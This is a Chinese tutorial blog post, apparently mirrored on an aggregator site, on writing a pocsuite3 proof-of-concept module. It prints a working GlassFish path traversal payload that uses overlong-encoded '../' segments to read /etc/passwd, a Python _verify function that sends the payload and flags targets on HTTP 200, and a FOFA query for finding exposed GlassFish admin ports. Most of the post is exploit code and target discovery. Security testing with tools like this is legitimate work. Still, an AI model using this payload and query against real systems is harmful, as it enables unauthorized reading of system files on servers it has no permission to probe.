zoukankan      html  css  js  c++  java
  • pocsuite3检测工具 编写poc

    github地址:https://github.com/knownsec/Pocsuite3

    首先确定pocsuit的命令执行方式

    verify模式为漏洞检测模式

    attack模式为向目标发起有效的攻击

    首先找到一个poc 进行分析源码

    复制其源码,再原有的基础框架进行修改,首先修改检测模块

    这里举例glassfish文件读取漏洞

    payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'

    这里根据网页的返回码进行判定是否存在漏洞,若code为200,则存在该漏洞。

    原thinkphp的检测模块

    修改后的

    更改描述

    fofa搜索:"glassfish" && port="4848"

    执行命令检测

    修改
        def _verify(self):
            result = {}
            poc_url=self.url  #根据原有框架获取url
            payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
            resp = requests.get(poc_url + payload)
            try:
                if resp.status_code == 200:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = poc_url
                    result['VerifyInfo']['Postdata'] = payload
            except Exception as e:
                pass
            return self.parse_output(result)
  • 相关阅读:
    js编码中常用的知识点
    oracle函数的使用
    oracle 临时表的使用
    oracle11G归档日志管理
    oracle中 高水位线详解
    oracle并行模式(Parallel)
    oracle常用函数详解(详细)
    oracle系统表的查询
    15000 字的 SQL 语句大全
    oracle_单引号问题和execute immediate 赋值问题
  • 原文地址:https://www.cnblogs.com/bingtang123/p/15139223.html
Copyright © 2011-2022 走看看